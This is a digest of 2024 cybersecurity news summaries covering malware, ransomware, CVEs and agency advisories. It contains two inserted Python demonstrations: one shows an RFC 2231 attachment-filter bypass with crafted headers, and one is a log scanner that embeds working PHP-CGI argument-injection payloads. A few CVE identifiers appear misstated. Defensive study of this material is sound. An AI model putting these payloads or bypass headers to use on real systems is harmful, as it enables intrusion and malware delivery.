
Linux servers are under threat from a stealthy malware known as "perfctl," aimed at running cryptocurrency mining and proxyjacking software. This malware employs advanced evasion tactics, remaining inactive during user activity and deleting its own files to avoid detection. It exploits a vulnerability in Polkit (CVE-2021-4043) to gain root access and install the miner. The name "perfctl" is a deliberate attempt to mimic legitimate system processes. The attack typically involves exploiting vulnerable Apache RocketMQ instances to deliver the malware. Once activated, perfctl hides itself by copying to different locations and may also download additional proxyjacking tools from remote servers.

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) have released a joint advisory warning against a group of Iran-based cyber actors that has conducted a high volume of computer network intrusion attempts against U.S. and foreign organizations since 2017 and as recently as August 2024, including schools, municipal governments, financial institutions, and healthcare facilities.

Critical WPML Plugin Flaw Exposes WordPress Sites to Remote Code Execution

A critical security vulnerability tracked as CVE-2024-6386 has been disclosed in the WPML WordPress multilingual plugin. WPML is a popular plugin used for building multilingual WordPress sites. It has over one million active installations. This vulnerability could allow authenticated users with Contributor-level access or higher to execute arbitrary code remotely under certain circumstances.

APT Group Exploits WPS Office for Windows RCE Vulnerability (CVE-2024-7262)

ESET researchers discovered a remote code execution vulnerability (CVE-2024-7262) in WPS Office for Windows, which was actively exploited by the South Korea-aligned cyberespionage group APT-C-60. This group targeted users in East Asian countries, leveraging the vulnerability to deploy a custom backdoor named "SpyGlace" by ESET, designed for cyberespionage purposes.

What Is Volt Typhoon?

Volt Typhoon is a Chinese state-sponsored hacker group known by various aliases such as Vanguard Panda and Bronze Silhouette. Recent developments reveal that these hackers have exploited a high-severity zero-day vulnerability in the Versa Director platform, which is used by ISPs to manage complex networks.

NCSC Advisory - WhatsApp Verification Code Scam

The National Cyber Security Centre (NCSC) of Ireland is warning of a growing trend in WhatsApp verification code scams targeting users. These scams initiate with the actors obtaining the victim's phone number and entering the number into WhatsApp's login screen.

Hackers Infect ISPs with Malware That Steals Customers' Credentials

Malicious hackers, likely backed by the Chinese government, have exploited a critical zero-day vulnerability in the Versa Director virtualization platform used by ISPs. This vulnerability, tracked as CVE-2024-39717, allowed attackers to infect at least four US-based ISPs with malware named "VersaMem," which steals customer credentials before they are encrypted.

Newly Discovered Group Offers CAPTCHA-Solving Services to Cybercriminals

A previously undiscovered group, dubbed "Greasy Opal," has been found aiding cyber attackers by providing CAPTCHA-solving services and other tools to bypass security measures. This group, based in the Czech Republic and active since 2009, was recently identified by Arkose Cyber Threat Intelligence Research after its tools were used in attacks on Arkose Labs' customers.

Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp

Meta shared insights on a small cluster of likely social engineering activity on WhatsApp that its security team was able to block after investigating user reports. This activity, which originated from Iran, attempted to target individuals in Israel, Palestine, Iran, the United States and the UK, focusing on political and diplomatic officials and other public figures, including some associated with the administrations of President Biden and former President Trump.

Bling Libra's Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware

Unit 42's recent investigation uncovered a shift in strategy by the Bling Libra group, which is known for its ShinyHunters ransomware. Instead of just selling stolen data as they have in the past, they've now turned to extorting their victims. This new approach involves using legitimate credentials they found in public repositories to break into and compromise Amazon Web Services (AWS) environments.

Critical Flaw in WordPress LiteSpeed Cache Plugin Allows Hackers Admin Access

A critical security vulnerability (CVE-2024-28000) has been identified in the LiteSpeed Cache plugin for WordPress, a widely used caching plugin with over five million active installations. This vulnerability, discovered by John Blackburn and submitted via the Patchstack Zero Day bug bounty program for WordPress, could allow unauthenticated attackers to gain administrator privileges on vulnerable WordPress websites.

Enterprise Server Vulnerable to Critical Auth Bypass Flaw

A critical vulnerability, CVE-2024-6800, was discovered in GitHub Enterprise Server by “ahacker1” through GitHub's Bug Bounty Program. This vulnerability could be exploited by an attacker with network access to bypass authentication and gain administrator privileges on the affected machine.

Most Ransomware Attacks Now Happen at Night

A report from Malwarebytes reveals that most ransomware attacks now occur between 1 a.m. and 5 a.m., aiming to catch cybersecurity teams off guard. The 2024 State of Ransomware Report, based on threat intelligence from Malwarebytes' ThreatDown unit, indicates that a majority of incidents happen in the early morning.

Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts

Yesterday, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint statement, highlighting Iran's longstanding interest in exploiting societal tensions, including the use of cyber operations to attempt to gain access to sensitive information related to U.S. elections.

Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor

A newly discovered backdoor named Msupedge has been deployed in a cyberattack against an unnamed university in Taiwan. The backdoor stands out due to its unconventional method of communicating with its command-and-control server via DNS traffic, which is a relatively rare and stealthy technique. The origins and objectives behind the Msupedge attack remain unknown.

Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America

A recent report by Kaspersky details the activities of BlindEagle, an APT group targeting Latin American entities and individuals since at least 2018. The group employs a variety of tactics, techniques, and procedures (TTPs) to achieve its objectives, which fluctuate between financial gain and espionage. BlindEagle primarily leverages phishing campaigns, often impersonating government or financial institutions, to deliver malicious payloads.

Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

A recent ValleyRAT malware campaign targeting Chinese speakers has been identified by FortiGuard Labs. This multi-stage malware employs sophisticated evasion techniques to establish persistent control over compromised systems. Key characteristics include heavy reliance on shellcode for in-memory execution, reducing file footprint, and the use of legitimate application icons to deceive victims.

Researchers Uncover New Infrastructure Tied to FIN7 Cybercrime Group

Researchers have uncovered new infrastructure linked to the financially motivated cybercrime group FIN7. This discovery, detailed in a report by Team Cymru in collaboration with Silent Push and Stark Industries Solutions, reveals two clusters of FIN7 activity connected to IP addresses from Post Ltd in Russia and SmartApe in Estonia.

New Mad Liberator Gang Uses Fake Windows Update Screen to Hide Data Theft

Sophos uncovered details on a new ransomware operation dubbed Mad Liberator, which uses social engineering to obtain access to victim environments, targeting users who rely on remote access tools installed on endpoints and servers. Since initiating operations in mid-July 2024, Mad Liberator has been observed targeting users of AnyDesk, a popular software used by IT teams to manage their environments, particularly when working with remote users and devices.

Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks

Malicious actors are increasingly using a cloud-based attack tool called Xeon Sender to conduct widespread smishing and spam campaigns by abusing legitimate software-as-a-service (SaaS) platforms. The tool, as noted by SentinelOne security researcher Alex Delamotte, allows attackers to send bulk SMS messages through multiple SaaS providers by using valid credentials for those services. Importantly, Xeon Sender doesn't exploit any inherent vulnerabilities in these providers but instead uses their legitimate APIs to carry out large-scale SMS spam attacks.

Attackers Exploit Public .env Files to Breach Cloud and Social Media Accounts

Unit 42 researchers uncovered a highly sophisticated extortion campaign that specifically targeted cloud environments by exploiting exposed environment variable files, commonly referred to as .env files. These files, which are often used to store sensitive information such as cloud service keys, API tokens, and database credentials, were inadvertently exposed due to misconfigurations in web servers and applications.

Ransomware Attack on Indian Payment System Traced Back to Jenkins Bug

A recent ransomware attack targeting India's National Payments Corporation (NPCI) has been linked to a flaw in Jenkins, a popular automation tool. The security weakness, known as CVE-2024-23897, was found in Jenkins' Command Line Interface, enabling unauthorized access to sensitive data on servers that hadn't been updated with the latest security patches.

Rogue PyPI Library Targets Solana Users, Steals Blockchain Wallet Keys

A recent discovery by security researchers at Sonatype, published on August 7th, 2024, highlights a new malicious package on the Python Package Index (PyPI) masquerading as a legitimate Solana blockchain library, "solana-py". This fake package leverages a typosquat technique, exploiting the slight naming discrepancy between the genuine "solana-py" project on GitHub and its simplified name "solana" on PyPI.

Australian Gold Producer Evolution Mining Hit by Ransomware

On August 8, 2024, Evolution Mining, a prominent Australian gold mining firm, experienced a ransomware attack that impacted its IT systems. The company has engaged external cyber forensic experts to investigate the incident, which is currently believed to be contained. While the attack disrupted IT operations, it is not anticipated to significantly impact overall mining operations.

CVE-2024-43121 - HUSKY Plugin Vulnerability

HUSKY is a product filter plugin for WooCommerce, the e-commerce plugin for WordPress, developed by “realmag777”; it extends the functionality of the base WooCommerce product. Around 478 million websites are built on WordPress. HUSKY lets website visitors easily search and filter WooCommerce products by categories, attributes, tags, taxonomies, meta fields, and product prices.

Beyond the Hype: Unveiling the Realities of WormGPT in Cybersecurity

The report delves into WormGPT, a Dark Web counterpart to ChatGPT designed to quickly generate phishing emails, malware, and harmful recommendations for hackers. Despite its alarming reputation, many of the concerns surrounding WormGPT are rooted in misunderstandings and exaggerations about AI-based hacking applications.

Inc Ransomware Encryptor Contains Keys to Victim Data Recovery

The Inc ransomware group recently carried out a significant cyberattack on McLaren Health Care, a multibillion-dollar healthcare network operating across Michigan, Indiana, and Ohio. The attack severely disrupted McLaren's IT and phone systems, forcing hospitals and outpatient clinics to implement "downtime procedures."

Emerging Phishing Campaign Targeting AWS Accounts

Wiz Threat Research has shed light on a new phishing campaign targeting AWS accounts. The campaign was spotted after an employee at Wiz received a phishing email containing a PNG image. The email was sent from an AWS account (likely compromised) using a spoofed email address, admin@alchemistdigital[.]ae.

Microsoft Fixes Six Actively Exploited Bugs

On August 14, 2024, Microsoft issued patches for six actively exploited vulnerabilities as part of its regular Patch Tuesday updates. These flaws affect Microsoft Project, various Windows products, and the Windows Scripting Engine. Notably, one high-severity vulnerability in Microsoft Project (CVE-2024-38189) could allow remote code execution if a victim opens a malicious file.

Iran Is Accelerating Cyber Activity That Appears Meant to Influence the US Election, Microsoft Says

Iran-linked threat actors are accelerating malicious online activity intended to influence the United States presidential election by capitalizing on political polarization. Their TTPs include creating fake news websites that target extremists, impersonating U.S. political activists, performing email phishing attacks from former political advisors, and attempting to log into an account belonging to a former presidential candidate, all to stoke division and political tension, especially in swing states where they potentially have the most influence.

ADT Confirms Data Breach After Customer Info Leaked on Hacking Forum

Security giant ADT has confirmed that it suffered a data breach after actors allegedly leaked stolen customer data on Breached Forums, a popular cybercriminal platform. In a Form 8-K filing with the Securities and Exchange Commission (SEC), ADT stated that it recently “experienced a cybersecurity incident during which unauthorized actors illegally accessed certain databases containing ADT customer order information.”

US Dismantles Laptop Farm Used by Undercover North Korean IT Workers

The U.S. Justice Department arrested Matthew Isaac Knoot, a 38-year-old Nashville man, for aiding North Korean IT workers in obtaining remote work at U.S. companies by posing as U.S.-based individuals. Knoot operated a "laptop farm," using stolen identities, including that of "Andrew M.," to deceive companies into sending laptops to his residence.

CrowdStrike's Legal Pressures Mount, Could Blaze Path to Liability

The CrowdStrike update from July, which caused significant disruptions across industries, has led to a flurry of lawsuits from investors and affected companies. This update, known as "Channel File 291," resulted in major operational issues, including crashes on 8.5 million computers, with damages estimated at $5.4 billion.

#StopRansomware: BlackSuit (Royal) Ransomware

CISA and the FBI have updated a joint advisory released back in March 2023 on the Royal ransomware group, highlighting that the gang has now rebranded into the BlackSuit operation. BlackSuit, which is an evolution of Royal ransomware, has been observed in attacks from September 2022 through June 2023 and shares numerous code similarities with Royal while exhibiting improved capabilities.

North Korea Kimsuky Launch Phishing Attacks on Universities

Researchers have detailed activities of the North Korean APT group Kimsuky, which has been targeting universities globally for espionage. Active since 2012, Kimsuky primarily targets South Korean entities but has extended its reach to the US, the UK, and Europe. The group specializes in sophisticated phishing campaigns, often impersonating academics or journalists to steal sensitive information.

Photovoltaic Platform Flaws Threatened Global Solar Grid

Researchers have discovered critical flaws in software that manages 20% of the world's solar electricity, posing significant risks of grid overloads and blackouts. Although solar power currently represents a minor share of U.S. electricity generation, it is projected to grow exponentially and potentially make up half of domestic electricity generation by 2050.

Attackers Use Multiple Techniques to Bypass Reputation-Based Security

Reputation-based security controls may not be as effective as commonly assumed in protecting organizations against unsafe web applications and content, according to a new study by Elastic Security. Researchers have identified several techniques attackers use to bypass these mechanisms, which rely on the reputation and trustworthiness of applications and content.

Critical Progress WhatsUp RCE Flaw Now Under Active Exploitation

A path traversal vulnerability leading to critical, unauthenticated remote code execution (RCE), identified as CVE-2024-4885 and reported on April 24th, 2024, affects Progress WhatsUp Gold versions 23.1.2 and earlier and has been actively exploited by threat actors since August 1, 2024. The Zero Day Initiative (ZDI) published a related advisory on July 3rd, 2024.

Cloud Cover: How Malicious Actors Are Leveraging Cloud Services

In the past year, there has been an increase in the number of threat actors leveraging legitimate cloud services in attacks. According to researchers at Symantec, trusted services like Microsoft OneDrive or Google Drive are frequently being abused given that traffic to and from such services is less likely to raise red flags than communications with attack-controlled infrastructure.

CrowdStrike Reveals Root Cause of Global System Outages

CrowdStrike has released a root cause analysis for the Falcon Sensor software update crash, which impacted millions of Windows devices globally. The incident, identified as "Channel File 291," was caused by a content validation issue linked to a new Template Type designed to enhance visibility into novel attack techniques.

Qualys 2024 Midyear Threat Landscape Review

Qualys' new 2024 Midyear Threat Landscape Review highlights a growing number of reported Common Vulnerabilities and Exposures (CVEs). Comparing January to mid-July of 2023 with the same period of 2024, the count of reported CVEs increased by 30%, from 17,114 in 2023 to 22,254 in 2024.

APT28 Targets Diplomats with HeadLace Malware via Car Sale Phishing Lure

Palo Alto Networks' Unit 42 reported a sophisticated phishing campaign, linked to the Russian state-sponsored threat actor Fighting Ursa (APT28), that targeted diplomatic personnel earlier this year. The operation employed a deceptive lure centered on a purported car sale, a theme that often resonates with diplomats, designed to entice victims into downloading a malicious ZIP archive.

New “Sitting Ducks” DNS Attack Lets Hackers Easily Take Over Domains

Researchers at Infoblox and Eclypsium have collaborated to uncover a sophisticated new attack vector within the Domain Name System (DNS), dubbed the Sitting Ducks attack. This discovery came while studying the infrastructure used by 404TDS, a Russian-hosted traffic distribution system, indicating the involvement of Russian-nexus cybercriminals.

OneBlood Target of Ransomware Event

OneBlood, the not-for-profit blood center serving much of the southeastern United States, stated that it is experiencing a ransomware event impacting its software system. While OneBlood remains operational and continues to collect, test, and distribute blood, the non-profit noted that it is operating at a significantly reduced capacity.

E-Commerce Fraud Campaign Uses 600+ Fake Sites

Security researchers have identified a sophisticated information-stealing fraud network, dubbed “Eriakos,” that lures victims to fake web shops through malicious Facebook ads. According to Recorded Future, this campaign exclusively targets mobile devices and users, making the scam websites accessible only via malvertising to evade security scanners.

DigiCert to Revoke 83,000+ SSL Certificates Due to Domain Validation Oversight

DigiCert, a certificate authority, has announced that it will revoke a subset of SSL/TLS certificates within 24 hours due to an oversight in verifying domain ownership. The affected certificates lack proper Domain Control Validation. DigiCert validates domain control by methods approved by the CA/Browser Forum, one of which involves setting up a DNS CNAME record with a random value provided by DigiCert.

Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes

A new malicious campaign has been observed utilizing Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale operation. These malicious apps, numbering over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification, leading to identity fraud.

Microsoft Says Massive Azure Outage Was Caused by DDoS Attack

On July 30th, 2024, a distributed denial-of-service (DDoS) attack triggered a service disruption impacting a subset of Microsoft 365 and Azure customers globally. The outage, lasting approximately eight hours between 11:45 UTC and 19:43 UTC, resulted in intermittent errors, timeouts, and latency spikes for affected users.

Black Basta Ransomware Switches to More Evasive Custom Malware

Black Basta is a ransomware-as-a-service (RaaS) operation that has been active since April 2022. To date, the ransomware gang has been attributed to over 500 attacks targeting organizations across the world. Just this year, the group claimed responsibility for attacks against several notable victims, including Veolia North America, Hyundai Motor Europe, and Keytronic.

Hacktivists Claim Leak of CrowdStrike Threat Intelligence

A hacktivist group, USDoD, has claimed to have leaked CrowdStrike's internal threat actor list, including indicators of compromise (IoCs). CrowdStrike acknowledged these claims in a blog post on July 25, 2024, noting that USDoD provided a download link for the alleged list and shared sample data on BreachForums.

Play Ransomware Group's New Linux Variant Targets ESXi, Shows Ties With Prolific Puma

Researchers at Trend Micro have uncovered a new Linux variant of the Play ransomware that is specifically designed to target VMware ESXi environments. Based on a sample submitted to VirusTotal, the Linux variant is compressed in a RAR file together with its Windows variant and hosted at hxxp://108.[BLOCKED].190/FX300.rar, an IP address that has previously hosted tools such as PsExec, NetScan, WinSCP, WinRAR, and the Coroxy backdoor, all of which Play actors have used in earlier attacks.

Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

A now-patched Microsoft Defender SmartScreen vulnerability (CVE-2024-21412) has been exploited to deliver information stealers like ACR Stealer, Lumma Stealer, and Meduza Stealer. This vulnerability allowed attackers to bypass SmartScreen warnings and deliver malicious payloads. The stealer campaign is targeting Spain, Thailand, and the US. The attack chain involves a series of intricately crafted files.

CrowdStrike Outage (update)

CrowdStrike is aware of reports of crashes on Windows hosts that have taken place after installing the latest update for CrowdStrike Falcon Sensor. CrowdStrike says that it has identified a content deployment related to this issue and reverted those changes.

Hackers use PoC exploits in attacks 22 minutes after release

According to Cloudflare's 2024 Application Security report, threat actors are increasingly quick to weaponize available proof-of-concept (PoC) exploits, sometimes within just 22 minutes of their public release. Covering activity from May 2023 to March 2024, the report highlights several emerging threat trends.

Critical Apache HugeGraph Vulnerability Under Attack - Patch ASAP

A critical remote code execution vulnerability (CVE-2024-27348, CVSS: 9.8) impacting Apache HugeGraph-Server versions before 1.3.0 has been actively exploited in the wild. The flaw resides in the Gremlin graph traversal language API and allows attackers to bypass security restrictions and gain complete control over vulnerable servers.

New BugSleep Malware Implant Deployed in MuddyWater Attacks

Researchers at Check Point have disclosed details of a new backdoor implant dubbed BugSleep that is actively being deployed in attacks by MuddyWater, an Iranian state-sponsored group, to steal files of interest and run commands on compromised systems. These attacks entail the use of phishing emails disguised as invitations to webinars or online courses, designed to redirect targets to archives containing malicious payloads hosted on the Egnyte secure file-sharing platform.

Critical Exim Bug Bypasses Security Filters on 1.5 Million Mail Servers

Last Wednesday, a critical vulnerability was patched in Exim, a free mail transfer agent (MTA) that's widely used on Unix-like operating systems. Tracked as CVE-2024-29929, the vulnerability pertains to an incorrect parsing of multiline RFC2231 header filenames, allowing threat actors to remotely deliver malicious executable attachments into end users' mailboxes by circumventing the $mime_filename extension-blocking protection mechanism.
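The bypass class described above, as an added Python illustration (this is not Exim's code and not a reproduction of the CVE-2024-29929 patch): a filter that reads only a single-line filename= parameter never sees the extension when the name is split across RFC 2231 continuation segments (filename*0=, filename*1*=, normally folded over several header lines), while a checker that reassembles the segments in order and decodes the extended form does. The Content-Disposition samples and the blocked-extension list are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Content-Disposition headers for the demonstration (not taken from
# the original page or from Exim). The first carries the filename in a single
# parameter; the other two split it across RFC 2231 continuation segments so
# that no single parameter value ends in ".exe".
SAMPLE_HEADERS = {
    "single_param": 'attachment; filename="invoice.exe"',
    "rfc2231_split": 'attachment; filename*0="invoice."; filename*1="exe"',
    "rfc2231_encoded": "attachment; filename*0*=utf-8''invoice%2E; filename*1*=exe",
}

# Hypothetical extension block list for the demonstration.
BLOCKED_EXTENSIONS = {"exe", "scr", "bat", "com", "pif", "vbs", "js"}

_SEGMENT_RE = re.compile(r"^filename\*(\d+)(\*?)$")


def parse_params(header):
    """Split a Content-Disposition value into {parameter: value}.

    Assumption for brevity: parameter values contain no literal ';'.
    Surrounding double quotes are stripped; names are lower-cased.
    """
    params = {}
    for part in header.split(";")[1:]:  # part 0 is the disposition type
        name, sep, value = part.partition("=")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        params[name] = value
    return params


def naive_filename(params):
    """The weak check: honour only a single-line 'filename=' parameter."""
    return params.get("filename")


def _decode_extended(value, first_segment):
    # Extended (*-suffixed) values are charset'language'percent-encoded; the
    # charset/language prefix appears only on the first segment.
    if first_segment and value.count("'") >= 2:
        value = value.split("'", 2)[2]
    return unquote(value)


def rfc2231_filename(params):
    """Reassemble filename*0, filename*1*, ... in numeric order (RFC 2231)."""
    segments = []
    for name, value in params.items():
        m = _SEGMENT_RE.match(name)
        if not m:
            continue
        idx, extended = int(m.group(1)), bool(m.group(2))
        if extended:
            value = _decode_extended(value, idx == 0)
        segments.append((idx, value))
    if segments:
        return "".join(v for _, v in sorted(segments))
    if "filename*" in params:  # single extended parameter, no continuation
        return _decode_extended(params["filename*"], True)
    return params.get("filename")


def extension_of(filename):
    if not filename or "." not in filename:
        return ""
    return filename.rsplit(".", 1)[1].lower()


def is_blocked(header, extractor):
    """True when the filename the extractor sees has a blocked extension."""
    return extension_of(extractor(parse_params(header))) in BLOCKED_EXTENSIONS


def compare_filters(headers=SAMPLE_HEADERS):
    """Map each sample label to (naive_blocks, rfc2231_blocks)."""
    return {
        label: (is_blocked(h, naive_filename), is_blocked(h, rfc2231_filename))
        for label, h in headers.items()
    }


if __name__ == "__main__":
    for label, (weak, strong) in compare_filters().items():
        print(label, "naive_blocks =", weak, "rfc2231_blocks =", strong)
```

Only the single-parameter sample is caught by the naive extractor; both split samples pass it and are caught only once the segments are reassembled. The practical check for any attachment filter is the same: decide on the name the receiving mail client will reconstruct, not on any one raw parameter.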

Microsoft Links Scattered Spider Hackers to Qilin Ransomware Attacks

Microsoft has reported that the Scattered Spider cybercrime gang, also known as Octo Tempest, UNC3944, and 0ktapus, has added Qilin ransomware to its arsenal and is now using it in attacks. In the second quarter of 2024, Octo Tempest, a financially motivated threat actor, incorporated RansomHub and Qilin into its ransomware campaigns.

Cybereason - HardBit Ransomware

Cybereason's Security Services Team has published a blog post detailing the TTPs of HardBit, a ransomware operation that first emerged in October 2022. HardBit appears to take inspiration from the LockBit ransomware gang: researchers note similarities in the group's marketing, including its group image/icons, fonts, and ransom notes.

Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

The APT group Void Banshee has been exploiting a newly disclosed security flaw in the Microsoft MHTML browser engine (CVE-2024-38112) to deploy the information-stealing malware Atlantida. Cybersecurity firm Trend Micro observed this activity in mid-May 2024, noting that the vulnerability was used in a multi-stage attack involving specially crafted internet shortcut (URL) files.

10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit

The article examines the cybercriminal ecosystem, focusing on the role of infostealer malware, which quietly extracts credentials and other valuable data from compromised systems. The landscape has shifted from solitary actors handling the entire process to a specialized marketplace in which different threat groups each take a part of the chain and collaborate to maximize their illicit gains.

Attackers Exploit URL Protections to Disguise Phishing Links

Cybercriminals are exploiting legitimate URL protection services to disguise phishing links, according to Barracuda researchers. These services, intended to protect users from malicious websites by rewriting URLs, are being misused to mask phishing URLs and direct victims to credential-harvesting sites.

DarkGate Malware Exploits Samba File Shares in Short-Lived Campaign

The recent DarkGate malware campaign, uncovered by Palo Alto Networks Unit 42, highlights a brief yet impactful exploitation of Samba file shares for malware distribution. Spanning March to April 2024, the campaign targeted regions across North America, Europe, and parts of Asia, utilizing Visual Basic Script (VBS) and JavaScript files hosted on public-facing servers.

Phishing Campaign Abuses SharePoint Servers

ANY.RUN, an interactive malware hunting service, warned on X (formerly Twitter) of a massive phishing campaign that abuses SharePoint to host PDFs containing phishing links. In a span of 24 hours, ANY.RUN says it observed over 500 public sandbox sessions involving SharePoint phishing.

U.S. Seizes Domains Used by AI-Powered Russian Bot Farm for Disinformation

A recent U.S. Department of Justice (DoJ) operation dismantled a large-scale Russian disinformation campaign utilizing AI-powered social media bots. The bot farm, targeting the U.S. and several other countries, employed fictitious online personas disguised as real users to spread pro-Kremlin messages. The operation, believed to be sponsored by the Kremlin and facilitated by an RT employee and an FSB officer, leveraged AI software called Meliorator to create and manage the bot network.

Multiple Threat Actors Exploit PHP Flaw CVE-2024-4577 to Deliver Malware

Multiple threat actors are exploiting the recently disclosed PHP vulnerability CVE-2024-4577 to deliver various malware families, according to the Akamai Security Intelligence Response Team. The flaw, which has a CVSS score of 9.8, is an OS command injection in PHP-CGI on Windows that stems from the Best-Fit character mapping Windows applies during encoding conversion.
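A detection pass over web server access logs, added here as an example (not Akamai's code and not the page's own): on Windows locales whose code page best-fit maps the soft hyphen (0xAD) to an ASCII hyphen, a query string such as ?%ADd+allow_url_include%3d1 reaches php-cgi as the argument -d allow_url_include=1. The payload percent-encodes every = so the query contains no unencoded equals sign, which is the condition under which CGI hands the query string to the handler as command-line arguments. The checker below flags both signals. The log lines, IP addresses, and directive list are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache-style access log lines for the demonstration (not from the
# original page). The first and third carry the CVE-2024-4577 argument-injection
# shape; the second is an ordinary request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2024:12:01:15 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512
198.51.100.9 - - [10/Jun/2024:12:02:40 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
203.0.113.7 - - [10/Jun/2024:12:03:02 +0000] "POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3d0+%add+disable_functions%3D%22%22 HTTP/1.1" 200 77
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# php.ini directives commonly set through injected "-d" arguments to turn
# php-cgi into a code-execution primitive (list chosen for the demonstration).
SUSPICIOUS_DIRECTIVES = (
    b"allow_url_include",
    b"auto_prepend_file",
    b"cgi.force_redirect",
    b"disable_functions",
)

# U+00AD as a single byte; best-fit conversion turns it into '-', so the
# two bytes 0xAD 'd' become the php-cgi option "-d".
SOFT_HYPHEN_D = b"\xadd"


def analyze_target(target):
    """Return the reasons a request target looks like CVE-2024-4577 abuse."""
    _path, _, query = target.partition("?")
    raw = unquote_to_bytes(query)  # percent-decode to bytes; '+' is left alone
    reasons = []
    if SOFT_HYPHEN_D in raw:
        reasons.append("soft hyphen followed by 'd' (best-fit maps 0xAD to '-')")
    # A query string with no unencoded '=' is passed to the CGI handler as
    # argv; combined with a php.ini directive name that is the injection shape.
    if "=" not in query and any(d in raw for d in SUSPICIOUS_DIRECTIVES):
        reasons.append("argv-style query carrying a php.ini directive")
    return reasons


def scan_log(text=SAMPLE_LOG):
    """Return [(ip, target, reasons)] for every line that trips a check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log():
        print(ip, target, "; ".join(reasons))
```

Decoding to bytes rather than to str matters: the soft hyphen is a single 0xAD byte in the request, and a decoder that assumes UTF-8 would mangle or drop it before the comparison. The second signal is independent of the locale trick and also catches the plain "-d" form on servers that are misconfigured to pass arguments through.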

Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk

China-linked APT41 is suspected of using an advanced version of StealthVector malware, dubbed DodgeBox, to deliver a new backdoor named MoonWalk. Zscaler ThreatLabz discovered DodgeBox, also known as DUSTPAN, in April 2024. Researchers Yin Hong Chang and Sudeep Singh explained that DodgeBox loads MoonWalk, which shares DodgeBox's evasion techniques and uses Google Drive for command-and-control communication.

Ransomware Groups Prioritize Defense Evasion for Data Exfiltration

Ransomware attackers are increasingly focusing on defense evasion tactics to extend their dwell time within victim networks, as highlighted in a new report by Cisco Talos. This shift is primarily driven by the double-extortion ransomware model, where attackers steal sensitive data and threaten to publish it online while locking down victims' systems.

Apple IDs Targeted in US Smishing Campaign

Symantec recently published a security bulletin warning about a phishing campaign targeting Apple users in the United States. These campaigns are mostly conducted via email but have increasingly been deployed via malicious SMS text messages (smishing).

Avast Provides DoNex Ransomware Decryptor to Victims

Beginning in March 2024, law enforcement organizations have been distributing decryptor keys to victims of the DoNex ransomware, according to Avast. The antivirus provider announced on July 8 that they have been quietly offering the decryptor after identifying a cryptographic flaw in the ransomware and its predecessors.

Cybersecurity Agencies Warn of China-linked APT40's Rapid Exploit Adaptation

Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about the China-linked cyber espionage group APT40, warning of its ability to exploit new security vulnerabilities within hours or days of their public release. APT40, also known by various aliases such as Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon, TA423, and TEMP.Periscope, has been active since at least 2013, primarily targeting organizations in the Asia-Pacific region.

Major ISP Accused of Mass Malware Attack on Customers

A major South Korean internet service provider, KT (formerly Korea Telecom), is facing serious allegations after reports surfaced that it installed malware on the computers of over 600,000 customers. The incident primarily targeted users of Webhard, a popular file-sharing service in South Korea.

Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks

Researchers have uncovered a sophisticated attack campaign targeting various Israeli entities using publicly available frameworks like Donut and Sliver. HarfangLab, a French cybersecurity firm, detailed the campaign, noting its highly targeted nature and the use of custom WordPress websites as payload delivery mechanisms. This campaign affects entities across unrelated verticals by leveraging well-known open-source malware.

Microsoft MSHTML Flaw Exploited to Deliver MerkSpy Spyware Tool

A recent attack campaign exploited a now-patched vulnerability (CVE-2021-40444) in Microsoft Office's MSHTML component to deliver MerkSpy spyware. This spyware primarily targeted users in Canada, India, Poland, and the U.S. The attackers meticulously crafted a deceptive Microsoft Word document disguised as a software developer job description to trick users into initiating the exploit.

CDK Global Says All Dealers Will Be Back Online By Thursday

On June 18th, CDK Global, a leading software-as-a-service provider that is used by over 15,000 car dealerships across North America, was the target of a ransomware attack, causing a massive IT outage. In particular, CDK Global's dealer management system was impacted, forcing car dealerships to switch to pen and paper, with buyers unable to purchase cars or receive service for already-bought vehicles.

Cisco Warns of NX-OS Zero-day Exploited to Deploy Custom Malware

Cisco has patched a zero-day vulnerability in NX-OS that was exploited in April to install previously unknown malware on vulnerable switches. The cybersecurity firm Sygnia reported the incidents to Cisco, attributing the attacks to a Chinese state-sponsored threat actor, Velvet Ant. Amnon Kushnir, Director of Incident Response at Sygnia, revealed that Velvet Ant used administrator-level credentials to access Cisco Nexus switches and deploy custom malware.

